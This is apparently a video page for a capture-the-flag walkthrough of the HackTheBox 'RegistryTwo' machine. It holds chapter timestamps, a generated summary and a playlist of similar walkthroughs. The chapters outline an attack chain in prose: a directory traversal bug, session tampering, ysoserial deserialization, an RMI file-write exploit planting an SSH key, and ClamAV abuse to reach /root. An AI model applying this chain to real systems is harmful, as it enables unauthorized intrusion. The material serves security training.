00:00 - Intro 01:00 - Start of nmap 03:10 - Enumerating port 5000/5001 to see a Docker Registry and Auth Server 06:10 - Creating our auth token for the Docker Registry 08:45 - Adding the SSL Cert to our certificate store, then doing a docker pull to download and run the container 13:00 - Discovering JSESSIONID Cookie, attempting the weird directory traversal bug of /..;/ (nginx directory didn't have a trailing slash on the location) 16:45 - The Examples directory has a sessions example that lets us modify the session, doing this to get a File Disclosure vulnerability then downloading the WAR file hosting the app 27:45 - Opening the WAR in JD-GUI then examining the source code, discovering we can change our user to admin by editing the session 33:30 - Pointing the RMI.HOST back to us, then use YSOSERIAL to host a malicious server 42:50 - YSOSERIAL-MODIFIED Docker is up, using YSOSERIAL to start a JRMP Listener and host a malicious payload 46:45 - Shell on the container, showing where IPv6 addresses are stored (/proc/if_inet6) and that we could have gotten this with the file disclosure which allows for bypassing the firewall, did not need to do the ysoserial step for this next one. 52:51 - Looking at the source code again, discovering we can use the RMI to perform file operations on the host 56:00 - Start of creating the RMI Client Java App 1:09:18 - Running into an error using our decompiled code. Having our exploit just reference the class files (before decompilation) 1:25:00 - Finishing up our exploit script, then writing an SSH Key 1:36:60 - Looking at running processes, discovering the RMI Server restarts every 3 minutes, then running PSPY discovering a quarentine.jar 1:43:00 - Looking at the initial JAR again, discovering it will give out a config. Using RECAF so I can just replace code in the jar without recompiling 1:48:00 - Looking at the Quarantine Service, which pulls a config from the RMI Server then runs CLAM AV 1:51:40 - Having CLAM AV scan /root, and fl
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
28 HackTheBox - Node
HackTheBox - Node
IppSec
29 HackTheBox - Kotarak
HackTheBox - Kotarak
IppSec
30 HackTheBox - Enterprise
HackTheBox - Enterprise
IppSec
31 HackTheBox - Sense
HackTheBox - Sense
IppSec
32 HackTheBox - Minion
HackTheBox - Minion
IppSec
33 VulnHub - Sokar
VulnHub - Sokar
IppSec
34 VulnHub - Pinkys Palace v2
VulnHub - Pinkys Palace v2
IppSec
35 HackTheBox - Inception
HackTheBox - Inception
IppSec
36 Vulnhub - Trollcave 1.2
Vulnhub - Trollcave 1.2
IppSec
37 HackTheBox - Ariekei
HackTheBox - Ariekei
IppSec
38 HackTheBox - Flux Capacitor
HackTheBox - Flux Capacitor
IppSec
39 HackTheBox - Jeeves
HackTheBox - Jeeves
IppSec
40 HackTheBox - Tally
HackTheBox - Tally
IppSec
41 HackTheBox - CrimeStoppers
HackTheBox - CrimeStoppers
IppSec
42 HackTheBox - Fulcrum
HackTheBox - Fulcrum
IppSec
43 HackTheBox - Chatterbox
HackTheBox - Chatterbox
IppSec
44 HackTheBox - Falafel
HackTheBox - Falafel
IppSec
45 How To Create Empire Modules
How To Create Empire Modules
IppSec
46 HackTheBox - Nightmare
HackTheBox - Nightmare
IppSec
47 HackTheBox - Nightmarev2  - Speed Run/Unintended Solutions
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
48 HackTheBox - Bart
HackTheBox - Bart
IppSec
49 HackTheBox -  Aragog
HackTheBox - Aragog
IppSec
50 HackTheBox - Valentine
HackTheBox - Valentine
IppSec
51 HackTheBox - Silo
HackTheBox - Silo
IppSec
52 HackTheBox - Rabbit
HackTheBox - Rabbit
IppSec
53 HackTheBox - Celestial
HackTheBox - Celestial
IppSec
54 HackTheBox - Stratosphere
HackTheBox - Stratosphere
IppSec
55 HackTheBox - Poison
HackTheBox - Poison
IppSec
56 HackTheBox - Canape
HackTheBox - Canape
IppSec
57 HackTheBox - Olympus
HackTheBox - Olympus
IppSec
58 HackTheBox - Sunday
HackTheBox - Sunday
IppSec
59 HackTheBox - Fighter
HackTheBox - Fighter
IppSec
60 HackTheBox - Bounty
HackTheBox - Bounty
IppSec

The video demonstrates a cybersecurity attack on the RegistryTwo box, exploiting vulnerabilities in the Docker registry and RMI service. The attack involves obtaining an auth token, accessing the registry catalog, and executing commands on the RMI server. The video covers various tools and techniques, including Nmap, curl, Java Decompiler, and YSO Serial.

Key Takeaways
  1. Enumerate versions and open formats with Nmap
  2. Run a curl command to access the Docker registry API
  3. Set up a RMI server to exfiltrate files
  4. Specify the header and token to access the catalog
  5. Use Java Decompiler to decompile the library
  6. Create a new Java class file to avoid decompilation issues
  7. Compile the Java class file to create a JAR file
  8. Use the JAR file to connect to the remote registry
💡 The video demonstrates the importance of secure coding practices and vulnerability exploitation in cybersecurity. It highlights the need for developers to understand and mitigate vulnerabilities in their code and for security professionals to use AI-powered tools for security testing and analysis.

Related Reads

📰
Monitoring Costs Are Out of Control — Here's How to Fix It
Learn how to reduce monitoring costs with a 5-step approach to auditing and optimizing your monitoring stack
Dev.to · Samson Tanimawo
📰
Web3 Sees Price Gains Amid Critical Argo CD Security Flaws Impacting Infrastructure
Web3 assets see price gains despite critical security flaws in Argo CD impacting infrastructure, highlighting the need for secure DevOps practices
Dev.to AI
📰
5 Terraform Architecture Decisions That Matter More Than Most Engineers Think
Learn 5 crucial Terraform architecture decisions to optimize infrastructure deployment
Dev.to · Guilherme Marochio
📰
Lilian Abiakam 2.0
Learn from Lilian Abiakam's impressive DevOps portfolio and discover how to build real-world projects with AWS, Kubernetes, and more
Medium · DevOps

Chapters (19)

Intro
1:00 Start of nmap
3:10 Enumerating port 5000/5001 to see a Docker Registry and Auth Server
6:10 Creating our auth token for the Docker Registry
8:45 Adding the SSL Cert to our certificate store, then doing a docker pull to down
13:00 Discovering JSESSIONID Cookie, attempting the weird directory traversal bug of
16:45 The Examples directory has a sessions example that lets us modify the session,
27:45 Opening the WAR in JD-GUI then examining the source code, discovering we can c
33:30 Pointing the RMI.HOST back to us, then use YSOSERIAL to host a malicious serve
42:50 YSOSERIAL-MODIFIED Docker is up, using YSOSERIAL to start a JRMP Listener and
46:45 Shell on the container, showing where IPv6 addresses are stored (/proc/if_inet
52:51 Looking at the source code again, discovering we can use the RMI to perform fi
56:00 Start of creating the RMI Client Java App
1:09:18 Running into an error using our decompiled code. Having our exploit just refer
1:25:00 Finishing up our exploit script, then writing an SSH Key
1:37:00 Looking at running processes, discovering the RMI Server restarts every 3 minu
1:43:00 Looking at the initial JAR again, discovering it will give out a config. Using
1:48:00 Looking at the Quarantine Service, which pulls a config from the RMI Server th
1:51:40 Having CLAM AV scan /root, and fl
Up next
Containers on Amazon ECS with Mama J
AWS Developers
Watch →